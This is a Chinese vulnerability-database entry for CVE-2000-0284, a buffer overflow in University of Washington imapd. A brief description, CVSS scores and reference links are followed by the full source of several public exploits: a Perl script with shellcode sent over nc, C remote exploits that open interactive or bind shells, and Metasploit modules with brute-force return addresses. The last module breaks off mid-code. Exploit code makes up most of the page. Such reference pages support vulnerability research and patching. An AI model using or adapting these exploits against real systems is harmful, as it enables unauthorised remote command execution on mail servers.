CVE-2000-0284
CVSS7.5
发布时间 :2000-04-16 00:00:00
修订时间 :2008-09-10 15:04:00
NMCOEPS    

[原文]Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.


[CNNVD]华盛顿大学的imapd的缓冲区溢出漏洞 (CNNVD-200004-040)

        华盛顿大学的4.7版本的imapd存在缓冲区溢出漏洞,用户可以通过LIST或其他指令以合法账号执行命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0284
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0284
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-040
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1110
(VENDOR_ADVISORY)  BID  1110
http://archives.neohapsis.com/archives/bugtraq/2000-04/0085.html
(UNKNOWN)  BUGTRAQ  20000416 imapd4r1 v12.264
http://archives.neohapsis.com/archives/bugtraq/2000-04/0074.html
(VENDOR_ADVISORY)  BUGTRAQ  20000416 imapd4r1 v12.264

- 漏洞信息

华盛顿大学的imapd的缓冲区溢出漏洞
高危 缓冲区溢出
2000-04-16 00:00:00 2005-10-20 00:00:00
远程  
        华盛顿大学的4.7版本的imapd存在缓冲区溢出漏洞,用户可以通过LIST或其他指令以合法账号执行命令。

- 公告与补丁

        This is a historical vulnerability database entry. Fixes may have been released which address this issue, however they may have not been included in the database. The analyst team will be retroactively updating the information in the vulnerability report.

- 漏洞信息 (253)

IMAP4rev1 10.190 Authentication Stack Overflow Exploit (EDBID:253)
linux remote
2001-01-19 Verified
143 teleh0r
N/A [点击下载]
#!/usr/bin/perl

## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: teleh0r@doglover.com / anno 2000
##
## This is nothing new - just wrote it for fun.

$shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80".
             "\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89".
             "\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c".
             "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80".
             "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
             "\x2f\x32\x39\x3e\x2f\x43\x38";


$len = 1052;       # Sufficient to overwrite the return value.
$nop = A;          # Using A/0x41 as nops to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.

if (@ARGV < 2) {
    print("Usage: $0 <target> <offset>\n");
    exit(1);
}

($target, $offset) = @ARGV;

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

$exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012";

system("(echo -e \"$exploit_string\" ; cat) | nc $target 143");


# milw0rm.com [2001-01-19]
		

- 漏洞信息 (284)

IMAP4rev1 12.261/12.264/2000.284 (lsub) Remote Exploit (EDBID:284)
linux remote
2001-03-03 Verified
143 SkyLaZarT
N/A [点击下载]
/* 
 *			!!! Private !!!
 *
 *  imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others? Yes!
 *
 *  By: SkyLaZarT ( fcerqueira@bufferoverflow.org ) .aka. Felipe Cerqueira
 *  Homepage: www.BufferOverflow.Org
 *  Thankz: cync, oldm and Jans. ( BufferOverflow.org Team )
 *		Antonio Marcelo and Felipe Saraiva
 *
 */


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

#define SIZE		1064
#define NOP		0x90
#define RET12261	0xbffff3ec
#define RET12264	0xbffff4e0
#define RET12264ZOOT	0xbffff697
#define RET2000_284	0xbfffebc8

#define INIT(x)	bzero(x, sizeof(x))
#define READ(sock,x) read(sock, x, sizeof(x)) 


#define TIMEOUT		20

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int debug = 0;


void openshell(int sock, int check);
void processSignal(int signum);

void processSignal(int signum) {
	fprintf(stderr, "Time out!!\n");
	exit(-1);
}


void openshell(int sock, int check) {
	char buffer[1024];
	fd_set rset;
	int i;
	
	while(1) {
		FD_ZERO(&rset);
		FD_SET(sock, &rset);
		FD_SET(fileno(stdin), &rset);

		select(sock + 1, &rset, NULL, NULL, NULL);

		if (FD_ISSET(sock, &rset)) {
			if ((i = read(sock, buffer, sizeof(buffer))) <= 0) {
				fprintf(stderr, "Connection terminated!\n");
				close(sock);
				exit(-1);
			} else {
				buffer[i] = 0x00;
				if(check) {
					if (!(strstr(buffer, "uid"))) {
						fprintf(stderr, "Exploit failed\n");
						exit(-1);
					} else {
						fprintf(stderr, "Exploit Success!!\n");
						check = 0;
					} 
				}

				puts(buffer);
			}
		}

		if (FD_ISSET(fileno(stdin), &rset)) {
			if ( check ) write(sock, "id\n", 3);
				
			if ((i = read(fileno(stdin), buffer, 
					sizeof(buffer))) > 0) {
				buffer[i] = 0x00;
				write(sock, buffer, i);
			}
		}
	}
}
				
				
int main(int argc, char **argv) {
	char buffer[SIZE], sockbuffer[2048];
	char *login, *password;
	long retaddr; 
	struct sockaddr_in sin;
	struct hostent *hePtr;
	int sock, i;	

	fprintf(stderr, "\nRemote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284\n"
		"Developed by SkyLaZarT - www.BufferOverflow.org\n\n");

	if ( argc < 5 ) {
		fprintf(stderr, "%s <host> <login> <password> <type> [offset]\n", argv[0]);
		fprintf(stderr, "\ttype: [0]\tSlackware 7.0 with IMAP4rev1 v12.261\n"
				"\ttype: [1]\tSlackware 7.1 with IMAP4rev1 v12.264\n"
				"\ttype: [2]\tRedHat 6.2 ZooT with IMAP4rev1 v12.264\n"
				"\ttype: [3]\tSlackware 7.0 with IMAP4rev1 2000.284\n\n");


		exit(-1);
	}

	login = argv[2];
	password = argv[3];

	switch(atoi(argv[4])) {
		case 0: retaddr = RET12261; break;
		case 1: retaddr = RET12264; break;
		case 2: retaddr = RET12264ZOOT; break;
		case 3: retaddr = RET2000_284; break;
		default: 
			fprintf(stderr, "invalid type.. assuming default " 
				"type 0\n");
			retaddr = RET12261; break;
			
	}

	if ( argc == 6 ) 
		retaddr += atoi(argv[5]);

	signal(SIGALRM, processSignal);	

	fprintf(stderr, "Trying to exploit %s...\n", argv[1]);

	fprintf(stderr, "Using return address 0x%08lx. Shellcode size: %i bytes\n\n", retaddr, strlen(shellcode));


	alarm(TIMEOUT);
	hePtr = gethostbyname(argv[1]);
	if (!hePtr) {
		fprintf(stderr, "Unknow hostname : %s\n", strerror(errno));
		exit(-1);
	}
	alarm(0);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	if ( sock < 0 ) {
		perror("socket()");
		exit(-1);
	}

	sin.sin_family = AF_INET;
	sin.sin_port = htons(143);
	memcpy(&sin.sin_addr, hePtr->h_addr, hePtr->h_length);
	bzero(&(sin.sin_zero), 8);

	fprintf(stderr, "Connecting... "); 
	alarm(TIMEOUT);
	if ( connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0 ) {
		fprintf(stderr, "failed to %s:143\n", argv[1]);
		exit(-1);
	}
	alarm(0);	
	
	fprintf(stderr, "OK\n");

	
        for ( i = 0; i <= SIZE; i += 4 )
                *(long *)&buffer[i] = retaddr;

        for ( i = 0; i < ( SIZE - strlen(shellcode) - 100); i++ )
                *(buffer+i) = NOP;

        memcpy(buffer + i, shellcode, strlen(shellcode));

	INIT(sockbuffer);
	READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);	

	fprintf(stderr, "Trying to loging ... ");

	sprintf(sockbuffer, "1 LOGIN %s %s\n", login, password);
	write(sock, sockbuffer, strlen(sockbuffer));
	
	INIT(sockbuffer);
	READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);
	
	if (!(strstr(sockbuffer, "OK LOGIN completed"))) {
		fprintf(stderr, "Login failed!!\n");
		close(sock);
		exit(-1);
	}

	fprintf(stderr, "OK\n");
	
	INIT(sockbuffer);
	sprintf(sockbuffer, "1 LSUB \"\" {1064}\r\n");
	write(sock, sockbuffer, strlen(sockbuffer));

        INIT(sockbuffer);
        READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);
	
	if(!(strstr(sockbuffer, "Ready"))) {
		fprintf(stderr, "LSUB command failed\n");
		close(sock);
		exit(-1);
	}	

	fprintf(stderr, "Sending shellcode... ");	
	
	write(sock, buffer, 1064);
	write(sock, "\r\n", 2);

	fprintf(stderr, "OK\n");
	
	fprintf(stderr, "PRESS ENTER for exploit status!!\n\n");	

	openshell(sock, 1);	
							
	close(sock);

	return 0;
}

// milw0rm.com [2001-03-03]
		

- 漏洞信息 (397)

WU-IMAP 2000.287(1-2) Remote Exploit (EDBID:397)
linux remote
2002-06-25 Verified
143 Teso
N/A [点击下载]
/* 7350owex- x86/linux WU-IMAP 2000.287(1-2) remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2002
* All Rights Reserved
*
*****************************************************************************
* bug found by scut 2002/06/25
* thanks to halvar,scut,typo,random,edi,xdr.
* special thanks to security.is.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0x080eb395 /* My Debian 2.2 box */
#define MAILDIR "/var/spool/mail"

char shellcode[] =
 "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
 "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
 "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
 "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
 "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
 "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
 "\xc0\x40\xcd\x80";

int main(int argc, char *argv[])
{
	int s, i;
	fd_set fds;
	char tmp[2048], buf[1060];
	char *target, *login, *pass, *p;
	struct sockaddr_in sock;
	unsigned long retaddr;

	fprintf(stderr, "%s\n", "7350owex by scut and zippo!");
	if (argc != 4)
	{
		fprintf(stderr, "Usage: %s <Target ip> <Login> <Password>\n", argv[0]);
		exit(-1);
	}

	retaddr = RETADDR;
	target  = argv[1];
	login   = argv[2];
	pass    = argv[3];

	s = socket(AF_INET, SOCK_STREAM, 0);
	sock.sin_port = htons(143);
	sock.sin_family = AF_INET;
	sock.sin_addr.s_addr = inet_addr(target);

	printf("\nConnecting to %s:143...", target);
	fflush(stdout);
	if ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)
	{
		printf("failed\n");
		exit(-1);
	}
	else
		recv(s, tmp, sizeof(tmp), 0);

	printf("done\nLogging in...");
	fflush(stdout);
	snprintf(tmp, sizeof(tmp), "A0666 LOGIN %s %s\n", login, pass);
	send(s, tmp, strlen(tmp), 0);
	recv(s, tmp, sizeof(tmp), 0);

	if (!strstr(tmp, "completed"))
	{
		printf("failed\n");
		exit(-1);
	}

	printf("done\nExploiting...");
	fflush(stdout);

	dprintf(s, "A0666 SELECT %s/%s\n", MAILDIR, login);

	memset(buf, 0x0, sizeof(buf));
	p = buf;
	memset(p, 0x90, 928);
	p += 928;
	memcpy(p, shellcode, 100);
	p += 100;

	for (i=0; i<6; i++)
	{
		memcpy(p, &retaddr, 0x4);
		p += 0x4;
	}

	snprintf(tmp, sizeof(tmp), "A0666 PARTIAL 1 BODY[%s] 1 1\n", buf);
	send(s, tmp, strlen(tmp), 0);
	dprintf(s, "A0666 LOGOUT\n");
	sleep(5);
	printf("done\n\n");

	read(s, tmp, sizeof(tmp));
	dprintf(s, "uname -a;id;\n");
	memset(tmp, 0x0, sizeof(tmp));

	while (1)
	{
		FD_ZERO(&fds);
		FD_SET(s, &fds);
		FD_SET(1, &fds);

		select((s+1), &fds, 0, 0, 0);

		if (FD_ISSET(s, &fds))
		{
			if ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)
			{
				fprintf(stderr, "Connection closed\n");
				exit(0);
			}
			write(0, tmp, i);
		}
		if (FD_ISSET(1, &fds))
		{
			i = read(1, tmp, sizeof(tmp));
			send(s, tmp, i, 0);
		}
	}

	return;
}



// milw0rm.com [2002-06-25]
		

- 漏洞信息 (10025)

University of Washington imap LSUB Buffer Overflow (EDBID:10025)
linux remote
2000-04-16 Verified
143 patrick
N/A [点击下载]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'UoW IMAP server LSUB Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the 'LSUB'
				command of the University of Washington IMAP service.
				This vulnerability can only be exploited with a valid username
				and password.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2000-0284' ],
					[ 'OSVDB', '12037' ],
					[ 'BID', '1110' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/284' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 964,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
					'Compat'   => 
						{
							'ConnectionType' => '-reverse',
						},
				},
			'Platform'       => 'linux',	
			'Targets'        => 
				[
					['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
				],
			'DisclosureDate' => 'Apr 16 2000',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /IMAP4rev1 v12.264/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe

	end

	def exploit
		connect_login

		print_status("Sending overflow string...")
		req = "a002 LSUB \"\" {1064}\r\n"
		sock.put(req)
		sleep(2)

		sploit = payload.encoded + rand_text_alphanumeric(64) + [target['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"

		sock.put(sploit)
		sleep(2)

		handler
		disconnect
	end

end
		

- 漏洞信息 (16846)

UoW IMAP server LSUB Buffer Overflow (EDBID:16846)
linux remote
2010-03-26 Verified
0 metasploit
N/A [点击下载]
##
# $Id: imap_uw_lsub.rb 8932 2010-03-26 19:00:23Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UoW IMAP server LSUB Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the 'LSUB'
				command of the University of Washington IMAP service.
				This vulnerability can only be exploited with a valid username
				and password.
			},
			'Author'         => [ 'patrick', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8932 $',
			'References'     =>
				[
					[ 'CVE', '2000-0284' ],
					[ 'OSVDB', '12037' ],
					[ 'BID', '1110' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/284' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 964,
					'BadChars' => "\x00\x0a\x0d\x2f",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'linux',
			'Targets'        =>
				[
					# ['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
					[ 'Linux Bruteforce',
						{
							'Platform'   => 'linux',
							'Offset'     => 1064,
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xbffffdfc },
									'Stop'  => { 'Ret' => 0xbfa00000 },
									'Step'  => 200
								}
						},
					]
				],
			'DisclosureDate' => 'Apr 16 2000',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /IMAP4rev1 v12.264/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe

	end

	def brute_exploit(addresses)
		print_status("Trying 0x%.8x ..." % addresses['Ret'])

		if (not connect_login)
			raise RuntimeError, "Unable to log in!"
		end

		req = "a002 LSUB \"\" {%d}\r\n" % target['Offset']
		sock.put(req)
		buf = sock.get_once

		sploit = payload.encoded + rand_text_alphanumeric(64) + [addresses['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"
		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (19847)

UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities (EDBID:19847)
unix remote
2002-08-01 Verified
0 Gabriel A. Maggiotti
N/A [点击下载]
source: http://www.securityfocus.com/bid/1110/info

A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.

Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.

Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on the machine. 

/*
------------------------------------------------------------------------------
Web:  http://qb0x.net                           Author: Gabriel A. Maggiotti
Date: Aug 01, 2002                            E-mail: gmaggiot@ciudad.com.ar
------------------------------------------------------------------------------

Redhat 7.0 remote buffer overflow exploit for IMAP4rev1 prior to v10.234


*/


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX     1200
#define MYPORT   143
#define PORT    30464

#define OFFSET 1080
#define NOP 0x90
#define RET 0xbffd8940 - OFFSET


char shellcode[]=
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\xcd\x80"                      /* int $0x80             */
        "\x85\xc0"                      /* testl %eax,%eax       */
        "\x75\x43"                      /* jne 0x43              */
        "\xeb\x43"                      /* jmp 0x43              */
        "\x5e"                          /* popl %esi             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\x89\xf1"                      /* movl %esi,%ecx        */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\xb0\x06"                      /* movb $0x6,%al         */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x01"                      /* movb $0x1,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
        "\xb0\x77"                      /* movb $0x77,%al        */
        "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
        "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
        "\xb0\x10"                      /* movb $0x10,%al        */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x02"                      /* movb $0x2,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xeb\x04"                      /* jmp 0x4               */
        "\xeb\x55"                      /* jmp 0x55              */
        "\xeb\x5b"                      /* jmp 0x5b              */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x04"                      /* movb $0x4,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x05"                      /* movb $0x5,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x88\xc3"                      /* movb %al,%bl          */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\x31\xc9"                      /* xorl %ecx,%ecx        */
        "\xcd\x80"                      /* int $0x80             */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\xb1\x01"                      /* movb $0x1,%cl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\xb1\x02"                      /* movb $0x2,%cl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
        "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
        "\xb0\x0b"                      /* movb $0xb,%al         */
        "\x89\xf3"                      /* movl %esi,%ebx        */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\xcd\x80"                      /* int $0x80             */
        "\xe8\x5b\xff\xff\xff";         /* call -0xa5            */

main(int argc, char *argv[])
{
	int i=0;
	char buf[MAX];
	int sockfd;
    int numbytes;

    struct hostent *he;
    struct sockaddr_in their_addr;

    if(argc!=4)
    {
		fprintf(stderr,"usage:%s <hostname> <user> <pass>\n",argv[0]);
		exit(1);
	}

    if((he=gethostbyname(argv[1]))==NULL)
    {
		perror("gethostbyname");
		exit(1);
	}

	if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
		perror("socket"); exit(1);
	}

	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(MYPORT);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);

	if( connect(sockfd,(struct sockaddr*)&their_addr,\
                 sizeof(struct sockaddr))==-1)
	{
		perror("connect");
		exit(1);
	}

	sprintf(buf,"1 LOGIN %s %s\r\n1 LSUB \"\" {1064}\r\n",argv[2],argv[3]);
	printf("%s",buf);

	for(i=0;i<=OFFSET -1 ;i++)
		buf[i]=NOP;
	for(;i<OFFSET+32;i+=4)
	*(int *) &buf[i] = RET;
//	*(int *) &buf[i+=4] = RET1;
	memcpy(buf+100,shellcode,strlen(shellcode));

    if( send(sockfd,buf,strlen(buf),0) ==-1)
    {
    	perror("send");
        exit(0);
    }

    close(sockfd);

/***************** second connection  ************************/
	sleep(2);

	if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
		perror("socket"); exit(1);
	}

	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(PORT);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);

	if( connect(sockfd,(struct sockaddr*)&their_addr,\
                 sizeof(struct sockaddr))==-1)
    {
   		 perror("connect");
    	 exit(1);
    }

   	printf("sh> ");
	while(1)
	{
		buf[0]='\0';
		fgets(buf,MAX-1,stdin);
		sprintf(buf,"%s \n",buf);
		//printf("%s\n",buf);
        if( send(sockfd,buf,strlen(buf),0) ==-1)
        {
                perror("send");
                exit(0);
        }

		buf[0]='\0';
        if( (numbytes=recv(sockfd,buf,MAX,0))==-1 ) {
	            perror("recv");
	            exit(1);
	        }

        buf[numbytes]='\0';
       	printf("%s\nsh> ",buf);

	}
    close(sockfd);

return 0;
}

		

- 漏洞信息 (19848)

UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta) (EDBID:19848)
unix remote
2000-04-16 Verified
0 vlad902
N/A [点击下载]
source: http://www.securityfocus.com/bid/1110/info
 
A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.
 
Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.
 
Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on the machine. 

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::uow_imap4_lsub;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };
my $info =
{
	'Name'  => 'University of Washington IMAP4 LSUB Overflow',
	'Version'  => '$Revision: 1.18 $',
	'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
	'Arch'  => [ 'x86', 'sparc' ],
	'OS'    => [ 'bsd', 'linux' ],
	'Priv'  => 0,
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 143],
		'USER'  => [1, 'DATA', 'User name'],
		'PASS'  => [1, 'DATA', 'Password'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	},
	'Payload' => {
		'Space'  => 680,
		'MinNops'=> 400,
		'BadChars'  => "\x00/",
		'Keys'   => ['+findsock', '+inetd'],
	},
	'Description'  => Pex::Text::Freeform(qq{
		This exploits a buffer overflow in the LSUB command. An overly long
		argument causes a classic stack buffer overflow.
	}),
	'Refs'  =>  [  
		['BID', 1110],
		['OSVDB', 12037],
	],
	'Targets' => [ 
		[ "Linux / x86 stack bruteforce", 0, 0xbffffdfc, 0xbfa00000, 400, 1064, \&Payloadx86 ],
		[ "FreeBSD / x86 stack bruteforce", 0, 0xbfbffdfc, 0xbf100000, 400, 1064, \&Payloadx86 ],
		[ "Linux+FreeBSD+NetBSD / x86 heap bruteforce", 1, 0x0804d000, 0x081f0000, -400, 1064, \&Payloadx86 ],
# These 2 could be consolidated and you'd get 5-6 useless hits on Linux but it's better this way.
		[ "Linux / sun4m stack bruteforce", 0, 0xefffeca0, 0xefa00000, 748, 1104, \&PayloadSPARC ],
		[ "NetBSD / sun4m stack bruteforce", 0, 0xeffffca0, 0xefa00000, 748, 1104, \&PayloadSPARC ],
		[ "OpenBSD / sun4m stack bruteforce", 0, 0xf7fffca0, 0xf7a00000, 748, 1104, \&PayloadSPARC ],
	],
	'Keys'  => ['imap'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;

	my $target = $self->Targets->[$target_idx];

	my $curr_ret;

	$self->PrintLine(sprintf("[*] Starting bruteforce mode for target %s.", $target->[0]));

	for (
		$curr_ret  = $target->[2];
		($target->[1] == 0 && $curr_ret >= $target->[3]) || ($target->[1] == 1 && $curr_ret <= $target->[3]);
		$curr_ret -= $target->[4]
	)
	{
		if(!($curr_ret & 0xff) || ($curr_ret & 0xff) == 0x20)
		{
			$curr_ret += 4;
		}
		if(!($curr_ret & 0xff00) || ($curr_ret & 0xff00) == 0x2000)
		{
			$curr_ret -= 0x0100;
		}

